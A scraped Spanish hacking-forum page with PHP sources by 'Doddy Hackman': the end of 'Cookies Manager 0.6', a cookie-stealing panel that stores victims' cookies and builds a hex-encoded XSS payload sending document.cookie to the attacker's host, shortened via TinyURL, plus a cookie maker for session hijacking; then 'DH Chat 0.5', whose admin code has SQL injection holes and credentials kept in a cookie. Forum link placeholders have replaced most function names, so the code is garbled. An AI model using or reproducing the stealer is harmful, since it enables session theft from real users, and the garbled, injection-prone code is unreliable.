    181. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[url]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/url]">
    182. <html xmlns="[url]http://www.w3.org/1999/xhtml[/url]">
    183.   <head>
    184.      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    185.      <title>Cookies Manager 0.6</title>
    186.      <link href="style.css" rel="stylesheet" type="text/css" />
    187.      <link rel="shortcut icon" href="images/icono.png">
    188.   </head>
    189.   <body>
    190.   <center>';
    191.        
    192.         echo '<br><img src="images/cookies.png" /><br>';
    193.        
    194.         if (You are not allowed to view links. Register or Login($_POST['makecookies'])) {
    195.            
    196.             if (You are not allowed to view links. Register or Login($_POST['name_cookie'], $_POST['value_cookie'], You are not allowed to view links. Register or Login() + 7200, $_POST['path_cookie'], $_POST['domain_cookie'])) {
    197.                 echo "<script>alert('Cookie maked');</script>";
    198.             } else {
    199.                 echo "<script>alert('Error making Cookie');</script>";
    200.             }
    201.         }
    202.        
    203.         $edit_name       = "";
    204.         $edit_value      = "";
    205.         $edit_expire     = "";
    206.         $edit_path       = "";
    207.         $edit_domain     = "";
    208.         $edit_secure     = "";
    209.         $edit_httponline = "";
    210.        
    211.         if (You are not allowed to view links. Register or Login($_POST['instalar'])) {
    212.            
    213.             $cookies_found = "create table cookies_found (
    214. id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
    215. fecha TEXT NOT NULL,
    216. ip TEXT NOT NULL,
    217. info TEXT NOT NULL,
    218. cookie TEXT NOT NULL,
    219. PRIMARY KEY (id));
    220. ";
    221.            
    222.             if (You are not allowed to view links. Register or Login($cookies_found)) {
    223.                 echo "<script>alert('Installed');</script>";
    224.             } else {
    225.                 echo "<script>alert('Error');</script>";
    226.             }
    227.         }
    228.        
    229.         if (You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("show tables like 'cookies_found'"))) {
    230.            
    231.             //
    232.            
    233.             if (You are not allowed to view links. Register or Login($_GET['del'])) {
    234.                 if (You are not allowed to view links. Register or Login($_GET['del'])) {
    235.                     if (@You are not allowed to view links. Register or Login("delete from cookies_found where id='" . $_GET['del'] . "'")) {
    236.                         echo "<script>alert('Cookie deleted');</script>";
    237.                     } else {
    238.                         echo "<script>alert('Error');</script>";
    239.                     }
    240.                 }
    241.             }
    242.            
    243.             // Cookies Found
    244.            
    245.            
    246.             $re  = You are not allowed to view links. Register or Login("select * from cookies_found order by id ASC");
    247.             $con = You are not allowed to view links. Register or Login($re);
    248.             echo '
    249.            <div class="post">
    250.                <h3>Cookies Found : ' . $con . '</h3>
    251.                   <div class="post_body"><br>';
    252.            
    253.             if ($con <= 0) {
    254.                 echo '<b>No cookies found</b><br>';
    255.             } else {
    256.                
    257.                 echo '<table>';
    258.                 echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>";
    259.                
    260.                 while ($ver = You are not allowed to view links. Register or Login($re)) {
    261.                     $cookies_view = $ver[4];
    262.                     You are not allowed to view links. Register or Login($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($cookies_view);
    263.                    
    264.                     echo "<td>" . You are not allowed to view links. Register or Login($ver[0]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[1]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[2]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[3]) . "</td>";
    265.                     echo "<td>" . You are not allowed to view links. Register or Login($cookies_view) . "</td><td>" . You are not allowed to view links. Register or Login($nombre) . "</td><td>" . You are not allowed to view links. Register or Login($valor_cookie) . "</td><td><a href=?del=" . You are not allowed to view links. Register or Login($ver[0]) . ">Delete</a></td><tr>";
    266.                    
    267.                 }
    268.                 echo "</table>";
    269.                
    270.             }
    271.            
    272.             echo '               <br></div>
    273.            </div>';
    274.            
    275.             //
    276.            
    277.             // Form para target
    278.            
    279.             echo '
    280.            <div class="post">
    281.                <h3>Enter Target</h3>
    282.                   <div class="post_body"><br>';
    283.            
    284.             echo "
    285. <form action='' method=POST>
    286. <b>Link : </b><input type=text size=40 name=target value='[url]http://localhost/dhlabs/xss/index.php?msg='=>[/url]</td><tr>
    287. <input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'> <input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
    288. </form>
    289.  
    290. ";
    291.            
    292.             echo '               <br></div>
    293.            </div>';
    294.            
    295.             // URLS
    296.            
    297.             if (You are not allowed to view links. Register or Login($_POST['generateurl'])) {
    298.                
    299.                 echo '
    300.            <div class="post">
    301.                <h3>Console</h3>
    302.                   <div class="post_body"><br>';
    303.                
    304.                 echo "<textarea cols=50 name=code readonly>\n";
    305.                 $script         = hex_encode("<script>document.location='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id='+document.cookie;</script>");
    306.                 //echo "[url]http://tinyurl.com/api-create.php?url=[/url]".$_POST['target'].$script."\n";
    307.                 $resultado_code = toma("[url]http://tinyurl.com/api-create.php?url=[/url]" . $_POST['target'] . $script);
    308.                 echo You are not allowed to view links. Register or Login($resultado_code);
    309.                 echo "\n</textarea></table>";
    310.                
    311.                 echo '               <br><br></div>
    312.            </div>';
    313.                
    314.             }
    315.             //
    316.            
    317.             // Get Cookies
    318.            
    319.             if (You are not allowed to view links. Register or Login($_POST['getcookies'])) {
    320.                
    321.                 echo '
    322.            <div class="post">
    323.                <h3>Console</h3>
    324.                   <div class="post_body"><br>';
    325.                
    326.                 echo "<textarea cols=50 rows=10 name=code readonly>\n";
    327.                 $resultado_code = ver_cookies_de_pagina($_POST['target']);
    328.                 echo You are not allowed to view links. Register or Login($resultado_code);
    329.                 echo "\n</textarea>";
    330.                
    331.                 echo '               <br><br></div>
    332.            </div>';
    333.                
    334.                 $leyendo_esto = You are not allowed to view links. Register or Login("\n", $resultado_code);
    335.                
    336.                 You are not allowed to view links. Register or Login($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($leyendo_esto[0]);
    337.                
    338.                 $edit_name       = $nombre;
    339.                 $edit_value      = $valor_cookie;
    340.                 $edit_expire     = $expires;
    341.                 $edit_path       = $path;
    342.                 $edit_domain     = $domain;
    343.                 $edit_secure     = $secure;
    344.                 $edit_httponline = $httponly;
    345.                
    346.             }
    347.            
    348.             //
    349.            
    350.             // Form para crear cookies
    351.            
    352.            
    353.             echo '
    354.            <div class="post">
    355.                <h3>Cookie Maker</h3>
    356.                   <div class="post_body"><br>';
    357.            
    358.             echo "
    359. <form action='' method=POST>
    360. <b>Name : </b><input type=text size=50 name=name_cookie value='$edit_name'><br><br>
    361. <b>Value : </b><input type=text size=50 name=value_cookie value='$edit_value'><br><br>
    362. <b>Expires : </b><input type=text size=50 name=expire_cookie value='$edit_expire'><br><br>
    363. <b>Path : </b><input type=text size=50 name=path_cookie value='$edit_path'><br><br>
    364. <b>Domain : </b><input type=text size=50 name=domain_cookie value='$edit_domain'><br><br>
    365. <b>Secure : </b><input type=text size=50 name=secure_cookie value='$edit_secure'><br><br>
    366. <b>HTTP Online : </b><input type=text size=50 name=httponline_cookie value='$edit_httponline'><br><br>
    367. <input type=submit name=makecookies style='height: 25px; width: 200px' value='Make Cookie'>
    368. </form>";
    369.            
    370.             echo '                <br></div>
    371.            </div>';
    372.            
    373.         } else {
    374.            
    375.             echo '
    376.            <div class="post">
    377.                <h3>Installer</h3>
    378.                   <div class="post_body">';
    379.             echo "
    380. <form action='' method=POST>
    381. <h2>Do you want install Cookies Manager ?</h2><br>
    382. <input type=submit name=instalar value=Install>
    383. </form><br>";
    384.            
    385.             echo '                </div>
    386.            </div>';
    387.         }
    388.        
    389.         echo '  
    390.        <br><h3>(C) Doddy Hackman 2015</h3><br>
    391.        </center>
    392.        </body>
    393. </html>';
    394.        
    395.     } else {
    396.         echo "<script>alert('Fuck You');</script>";
    397.     }
    398. } else {
    399.     echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
    400. }
    401.  
    402. // The End ?
    403.  
    404. ?>
    405.  

    style.css

    Código: CSS
    1. /*
    2.  
    3. ==-----------------------------------==
    4. || Name : DH Theme                   ||
    5. || Version : 0.8                     ||  
    6. || Author : Doddy H                  ||
    7. || Description: Templante            ||
    8. || Date : 14/1/2015                  ||
    9. ==-----------------------------------==
    10.  
    11. */
    12.  
    13. body {
    14.    background:transparent url("images/fondo.jpg") repeat scroll 0 0;
    15.    color:gray;
    16.    font-family:helvetica,arial,sans-serif;
    17.    font-size:14px;
    18.    text-align:center;
    19. }
    20.  
    21. a:link {
    22.    text-decoration:none;
    23.    color:orange;
    24. }
    25. a:visited {
    26.    color:orange;
    27. }
    28. a:hover {
    29.    color:orange;
    30. }
    31.  
    32. td,tr {
    33.    border-style:solid;
    34.    border-color: gray;
    35.    border-width: 1px;
    36.    background: black;
    37.    border: solid #222 2px;
    38.    color:gray;
    39.    font-family:helvetica,arial,sans-serif;
    40.    font-size:14px;
    41.    text-align:center;
    42. }
    43.  
    44. textarea {
    45.    font: normal 10px Verdana, Arial, Helvetica,sans-serif;
    46.    background-color:black;
    47.    color:gray;
    48.    border: solid #222 2px;
    49.    border-color:gray
    50. }
    51.  
    52. input {
    53.    border-style:solid;
    54.    border-color: gray;
    55.    border-width: 1px;
    56.    background: black;
    57.    border: solid #222 2px;
    58.    color:gray;
    59.    font-family:helvetica,arial,sans-serif;
    60.    font-size:14px;
    61. }
    62.  
    63. .post {
    64.    background-color:black;
    65.    color:gray;
    66.    margin-bottom:10px;
    67.    width:600px;
    68.    word-wrap: break-word;
    69. }
    70.  
    71. .post h3 {
    72.    background-color:black;
    73.    color:orange;
    74.    background-color:#000;
    75.    border: solid #222 2px;
    76.    -webkit-border-radius: 4px;
    77.    -moz-border-radius: 4px;
    78.    border-radius: 4px;
    79.    padding:5px 10px;
    80. }
    81.  
    82. .post_body {
    83.    background-color:black;
    84.    margin:-20px 0 0 0;
    85.    color:white;
    86.    background-color:#000;
    87.    border: solid #222 2px;
    88.    -webkit-border-radius: 4px;
    89.    -moz-border-radius: 4px;
    90.    border-radius: 4px;
    91.    padding:5px 10px;
    92. }
    93.  
    94. /* The End ? */
    95.  

    Un video con ejemplo de usos :



    Si quieren bajar el programa lo pueden hacer de aca :

    You are not allowed to view links. Register or Login.
    You are not allowed to view links. Register or Login.

50
Back-end / [PHP] DH Chat 0.5
« en: Diciembre 04, 2015, 12:23:37 pm »
Un simple chat que hice en PHP que tiene las siguientes opciones :

  • Solo permite 10 mensajes por lo que borra por antiguedad[/li]
  • Filtra malas palabras[/li]
  • Se pueden borrar comentarios desde el administrador[/li][/list]

    Una imagen :



    Los codigos :

    index.php

    Código: PHP
    1. <?php
    2.  
    3. // DH Chat 0.5
    4. // (C) Doddy Hackman 2015
    5.  
    6. // Login
    7.  
    8. $username = "admin"; // Edit
    9. $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
    10.  
    11. //
    12.  
    13. $index = "admin.php"; // Edit
    14.  
    15. if (You are not allowed to view links. Register or Login($_GET['poraca'])) {
    16.    
    17.     echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[url]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/url]">
    18. <html xmlns="[url]http://www.w3.org/1999/xhtml[/url]">
    19.   <head>
    20.      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    21.      <title>Login</title>
    22.      <link rel="shortcut icon" href="images/icono.png">
    23.      <link href="style.css" rel="stylesheet" type="text/css" />
    24.   </head>
    25.   <body>
    26.      <center><br>
    27.         <div class="post">
    28.            <h3>Login</h3>
    29.            <div class="post_body">
    30.               <img src="images/login.jpg" width="562" height="440" />
    31.               <br />
    32.               <form action="" method=POST>
    33.                  Username : <input type=text size=30 name=username /><br /><br />
    34.                  Password : <input type=password size=30 name=password /><br /><br />
    35.                  <input type=submit name=login style="width: 100px;" value=Login /><br /><br />
    36.               </form>
    37.            </div>
    38.         </div>
    39.      </center>
    40.   </body>
    41. </html>';
    42.    
    43.     if (You are not allowed to view links. Register or Login($_POST['login'])) {
    44.        
    45.         $test_username = $_POST['username'];
    46.         $test_password = You are not allowed to view links. Register or Login($_POST['password']);
    47.        
    48.         if ($test_username == $username && $test_password == $password) {
    49.             You are not allowed to view links. Register or Login("login", You are not allowed to view links. Register or Login($test_username . "@" . $test_password));
    50.             echo "<script>alert('Welcome idiot');</script>";
    51.             $ruta = "http://" . $_SERVER['HTTP_HOST'] . You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) . "/" . $index;
    52.             echo '<meta http-equiv="refresh" content="0; url=' . You are not allowed to view links. Register or Login($ruta) . '" />';
    53.         } else {
    54.             echo "<script>alert('Fuck You');</script>";
    55.         }
    56.     }
    57.    
    58. } else {
    59.     echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
    60. }
    61.  
    62. // The End ?
    63.  
    64. ?>
    65.  

    admin.php

    Código: PHP
    1. <?php
    2.  
    3. // DH Chat 0.5
    4. // (C) Doddy Hackman 2015
    5.  
    6. You are not allowed to view links. Register or Login(0);
    7.  
    8. // Login
    9.  
    10. $username = "admin"; // Edit
    11. $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
    12.  
    13. // DB
    14.  
    15. $host  = "localhost"; // Edit
    16. $userw = "root"; // Edit
    17. $passw = ""; // Edit
    18. $db    = "chat"; // Edit
    19.  
    20. if (You are not allowed to view links. Register or Login($_COOKIE['login'])) {
    21.    
    22.     $st = You are not allowed to view links. Register or Login($_COOKIE['login']);
    23.    
    24.     $plit = You are not allowed to view links. Register or Login("@", $st);
    25.     $user = $plit[0];
    26.     $pass = $plit[1];
    27.    
    28.     if ($user == $username and $pass == $password) {
    29.        
    30.         echo '
    31. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[url]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd[/url]">
    32. <html xmlns="[url]http://www.w3.org/1999/xhtml[/url]">
    33.   <head>
    34.      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    35.      <title>DH Chat 0.5</title>
    36.      <link rel="shortcut icon" href="images/icono.png">
    37.      <link href="style.css" rel="stylesheet" type="text/css" />
    38.   </head>
    39.   <body>
    40.   <center>
    41.   ';
    42.        
    43.         You are not allowed to view links. Register or Login($host, $userw, $passw);
    44.         You are not allowed to view links. Register or Login($db);
    45.        
    46.         echo '         <br><img src="images/chat.png" /><br>';
    47.        
    48.         if (You are not allowed to view links. Register or Login($_POST['instalar'])) {
    49.            
    50.             $todo = "create table mensajes (
    51. id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
    52. mensaje TEXT NOT NULL,
    53. apodo VARCHAR(255) NOT NULL,
    54. PRIMARY KEY (id_comentario));
    55. ";
    56.            
    57.             $todo2 = "create table insultos (
    58. id_insulto int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
    59. mensaje TEXT NOT NULL,
    60. PRIMARY KEY (id_insulto));
    61. ";
    62.            
    63.             if (You are not allowed to view links. Register or Login($todo)) {
    64.                 if (You are not allowed to view links. Register or Login($todo2)) {
    65.                    
    66.                     $insultos = You are not allowed to view links. Register or Login(
    67.                         "lammer",
    68.                         "lamer",
    69.                         "maricon",
    70.                         "noob"
    71.                     );
    72.                    
    73.                     foreach ($insultos as $con) {
    74.                         @You are not allowed to view links. Register or Login("INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$con')");
    75.                     }
    76.                    
    77.                     echo "<script>alert('Installed');</script>";
    78.                     echo '<meta http-equiv="refresh" content=0;URL=>';
    79.                 }
    80.             } else {
    81.                 echo "<script>alert('Error');</script>";
    82.             }
    83.         }
    84.        
    85.         if (You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("show tables like 'mensajes'"))) {
    86.            
    87.             //
    88.            
    89.             $re = You are not allowed to view links. Register or Login("select * from mensajes order by id_comentario ASC");
    90.            
    91.             if (You are not allowed to view links. Register or Login($_GET['id'])) {
    92.                 if (You are not allowed to view links. Register or Login($_GET['id'])) {
    93.                     if (@You are not allowed to view links. Register or Login("delete from mensajes where id_comentario='" . $_GET['id'] . "'")) {
    94.                         echo "<script>alert('Comment deleted');</script>";
    95.                     } else {
    96.                         echo "<script>alert('Error');</script>";
    97.                     }
    98.                 }
    99.             }
    100.            
    101.             $sql       = "select id_comentario from mensajes";
    102.             $resultado = You are not allowed to view links. Register or Login($sql);
    103.             $cantidad  = You are not allowed to view links. Register or Login($resultado);
    104.            
    105.             echo '
    106.            <div class="post">
    107.                <h3>Comments : ' . $cantidad . '</h3>
    108.                   <div class="post_body"><br>';
    109.             if ($cantidad <= 0) {
    110.                 echo '<b>No entries found</b><br>';
    111.             } else {
    112.                 echo "<table>";
    113.                 echo "<td><b>ID</b></td><td><b>Nick</b></td><td><b>Text</b></td><td><b>Option</b></td><tr>";
    114.                
    115.                 while ($ver = You are not allowed to view links. Register or Login($re)) {
    116.                     echo "<td>" . You are not allowed to view links. Register or Login($ver[0]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[2]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[1]) . "</td><td><a href=?id=" . You are not allowed to view links. Register or Login($ver[0]) . ">Delete</a></td><tr>";
    117.                 }
    118.                
    119.                 echo "</table>";
    120.                
    121.             }
    122.            
    123.             echo '                <br></div>
    124.            </div>';
    125.            
    126.             if (You are not allowed to view links. Register or Login($_POST['new_word'])) {
    127.                 $in = $_POST['word'];
    128.                 if (@You are not allowed to view links. Register or Login("INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$in')")) {
    129.                     echo "<script>alert('Word added');</script>";
    130.                 } else {
    131.                     echo "<script>alert('Error');</script>";
    132.                 }
    133.             }
    134.            
    135.             if (You are not allowed to view links. Register or Login($_GET['del_word'])) {
    136.                 if (You are not allowed to view links. Register or Login($_GET['del_word'])) {
    137.                     if (@You are not allowed to view links. Register or Login("delete from insultos where id_insulto='" . $_GET['del_word'] . "'")) {
    138.                         echo "<script>alert('Word deleted');</script>";
    139.                     } else {
    140.                         echo "<script>alert('Error');</script>";
    141.                     }
    142.                 }
    143.             }
    144.            
    145.             echo '
    146.         <div class="post">
    147.            <h3>Block words</h3>
    148.            <div class="post_body"><br>
    149.            ';
    150.            
    151.             echo "
    152. <form action='' method=POST>
    153. <b>Word : </b><input type=text name=word>
    154. <input type=submit name=new_word style='width: 100px;' value=Add>
    155. </form>";
    156.            
    157.             echo '
    158.            <br>
    159.            </div>
    160.         </div>
    161.         ';
    162.            
    163.            
    164.             $sql       = "select id_insulto from insultos";
    165.             $resultado = You are not allowed to view links. Register or Login($sql);
    166.             $cantidad  = You are not allowed to view links. Register or Login($resultado);
    167.            
    168.             echo '
    169.         <div class="post">
    170.            <h3>Words blocked : ' . $cantidad . '</h3>
    171.            <div class="post_body"><br>
    172.            ';
    173.            
    174.             $rea = You are not allowed to view links. Register or Login("select * from insultos order by id_insulto ASC");
    175.            
    176.             if ($cantidad <= 0) {
    177.                 echo '<b>No entries found</b><br>';
    178.             } else {
    179.                 echo "<table>";
    180.                 echo "<td>ID</td><td>Word</td><td>Option</td><tr>";
    181.                 while ($ver = You are not allowed to view links. Register or Login($rea)) {
    182.                     echo "<td>" . You are not allowed to view links. Register or Login($ver[0]) . "</td><td>" . You are not allowed to view links. Register or Login($ver[1]) . "</td><td><a href=?del_word=" . You are not allowed to view links. Register or Login($ver[0]) . ">Delete</a></td><tr>";
    183.                 }
    184.                
    185.                 echo "</table>";
    186.                
    187.             }
    188.            
    189.             echo '
    190.            <br>
    191.            </div>
    192.         </div>
    193.         ';
    194.            
    195.         } else {
    196.            
    197.             echo '
    198.            <div class="post">
    199.                <h3>Installer</h3>
    200.                   <div class="post_body">';
    201.            
    202.             echo "
    203. <form action='' method=POST>
    204. <h2>Do you want install DH Chat 0.5 ?</h2><br>
    205. <input type=submit name=instalar style='width: 100px;' value=Install>
    206. </form><br>";
    207.             echo '                </div>
    208.            </div>';
    209.         }
    210.        
    211.         echo '  
    212.   <br><h3>(C) Doddy Hackman 2015</h3><br>
    213.   </center>
    214.   </body>
    215. </html>';
    216.        
    217.         You are not allowed to view links. Register or Login();
    218.         You are not allowed to view links. Register or Login(1);
    219.        
    220.     } else {
    221.         echo "<script>alert('Fuck You');</script>";
    222.     }
    223.    
    224. } else {
    225.     echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
    226. }
    227.  
    228. // The End ?
    229.  
    230. ?>
    231.  

    style.css

    Código: CSS
    1. /*
    2.  
    3. ==-----------------------------------==
    4. || Name : DH Theme                   ||
    5. || Version : 0.8                     ||  
    6. || Author : Doddy H                  ||
    7. || Description: Templante            ||
    8. || Date : 14/1/2015                  ||
    9. ==-----------------------------------==
    10.  
    11. */
    12.  
    13. body {
    14.    background:transparent url("images/fondo.jpg") repeat scroll 0 0;
    15.    color:gray;
    16.    font-family:helvetica,arial,sans-serif;
    17.    font-size:14px;
    18.    text-align:center;
    19. }
    20.  
    21. a:link {
    22.    text-decoration:none;
    23.    color:orange;
    24. }
    25. a:visited {
    26.    color:orange;
    27. }
    28. a:hover {
    29.    color:orange;
    30. }
    31.  
    32. td,tr {
    33.    border-style:solid;
    34.    border-color: gray;
    35.    border-width: 1px;
    36.    background: black;
    37.    border: solid #222 2px;
    38.    color:gray;
    39.    font-family:helvetica,arial,sans-serif;
    40.    font-size:14px;
    41.    text-align:center;
    42.    
    43.    word-wrap: break-word;
    44.    word-break:break-all;
    45. }
    46.  
    47. input {
    48.    border-style:solid;
    49.    border-color: gray;
    50.    border-width: 1px;
    51.    background: black;
    52.    border